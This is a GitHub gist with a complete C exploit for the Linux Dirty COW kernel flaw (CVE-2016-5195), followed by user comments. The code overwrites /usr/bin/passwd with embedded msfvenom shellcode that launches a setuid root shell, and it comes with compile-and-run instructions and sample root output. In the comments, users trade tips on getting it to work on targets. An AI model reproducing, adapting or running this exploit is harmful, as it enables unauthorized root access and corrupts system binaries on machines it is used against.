Instantly share code, notes, and snippets.

Embed
What would you like to do?
PTRACE_POKEDATA variant of CVE-2016-5195
/*
* A PTRACE_POKEDATA variant of CVE-2016-5195
* should work on RHEL 5 & 6
*
* (un)comment correct payload (x86 or x64)!
* $ gcc -pthread c0w.c -o c0w
* $ ./c0w
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* mmap fa65a000
* madvise 0
* ptrace 0
* $ /usr/bin/passwd
* [root@server foo]# whoami
* root
* [root@server foo]# id
* uid=0(root) gid=501(foo) groups=501(foo)
* @KrE80r
*/
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <unistd.h>
int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;
// change if no permissions to read
char suid_binary[] = "/usr/bin/passwd";
/*
* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
*/
unsigned char shell_code[] = {
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
};
unsigned int sc_len = 177;
/*
* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
unsigned char shell_code[] = {
0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
0x89, 0xe1, 0xcd, 0x80
};
unsigned int sc_len = 136;
*/
void *madviseThread(void *arg) {
int i,c=0;
for(i=0;i<200000000;i++)
c+=madvise(map,100,MADV_DONTNEED);
printf("madvise %d\n\n",c);
}
int main(int argc,char *argv[]){
printf(" \n\
(___) \n\
(o o)_____/ \n\
@@ ` \\ \n\
\\ ____, /%s \n\
// // \n\
^^ ^^ \n\
", suid_binary);
char *backup;
printf("DirtyCow root privilege escalation\n");
printf("Backing up %s to /tmp/bak\n", suid_binary);
asprintf(&backup, "cp %s /tmp/bak", suid_binary);
system(backup);
f=open(suid_binary,O_RDONLY);
fstat(f,&st);
map=mmap(NULL,st.st_size+sizeof(long),PROT_READ,MAP_PRIVATE,f,0);
printf("mmap %x\n\n",map);
pid=fork();
if(pid){
waitpid(pid,NULL,0);
int u,i,o,c=0,l=sc_len;
for(i=0;i<10000/l;i++)
for(o=0;o<l;o++)
for(u=0;u<10000;u++)
c+=ptrace(PTRACE_POKETEXT,pid,map+o,*((long*)(shell_code+o)));
printf("ptrace %d\n\n",c);
}
else{
pthread_create(&pth,
NULL,
madviseThread,
NULL);
ptrace(PTRACE_TRACEME);
kill(getpid(),SIGSTOP);
pthread_join(pth,NULL);
}
return 0;
}
@gezihua

This comment has been minimized.

gezihua commented Oct 26, 2016

Help,it does not work on Android device.

@tuxayo

This comment has been minimized.

tuxayo commented Oct 27, 2016

Does it cause system instabilities? see dirtycow/dirtycow.github.io#25

@ghost

This comment has been minimized.

ghost commented Oct 30, 2016

After running, why I execute /usr/bin/passwd it's changing passwd user ?

@KrE80r

This comment has been minimized.

Owner

KrE80r commented Nov 3, 2016

Sorry for the delay , to answer your questions 👍
1- This if or x86 machines , Android devices run on ARM processors
2- No instability faced while testing , of course no warranty given
3- this exploit overwrites /usr/bin/passwd with a root shell hence you have to run /us/bin/passwd once it's done .

@ghost

This comment has been minimized.

ghost commented Nov 7, 2016

Thanks!
I think I should have a try !

@TonyStark

This comment has been minimized.

TonyStark commented Mar 10, 2017

not found in my android /usr/bin/passwd
what to do

@sourishbanerjee

This comment has been minimized.

sourishbanerjee commented Apr 11, 2017

Thank you KrE80r.

This has worked perfectly in the below target machine:

Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-3630QM CPU @ 2.40GHz GenuineIntel GNU/Linux

There were couple of changes I had to made, which were intuitive enough:

  • 1. [ ] Changing the SUID Binary filename to a file which the non privileged user has read access.
  • 2. [ ] Change the shellcode to suit my 32 bit target machine

Regards,
Sourish

@X-HAT

This comment has been minimized.

X-HAT commented Sep 8, 2017

After the exploit finish i run /usr/bin/passwd and i get this message : Segmentation fault

uname -a : Linux ns1.xxx.com 2.6.32-573.26.1.el6.x86_64 #1 SMP Wed May 4 00:57:44 UTC 2016 x86_64

Any help ?
Thanks.

@totoroha

This comment has been minimized.

totoroha commented Sep 29, 2017

This is the error that i got:

/tmp/ccfbTOcY.o: In function main': c0w.c:(.text+0x261): undefined reference to pthread_create'
c0w.c:(.text+0x295): undefined reference to `pthread_join'
collect2: error: ld returned 1 exit status

Any suggestion Sir?

@ndunks

This comment has been minimized.

ndunks commented Nov 27, 2017

Same got Segmentation fault
Linux xxx 2.6.32-74-server #142-Ubuntu SMP Tue Apr 28 10:12:19 UTC 2015 x86_64 GNU/Linux

@Kagurawei

This comment has been minimized.

Kagurawei commented Feb 4, 2018

Hi can someone explain how this c0w.c works ??

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment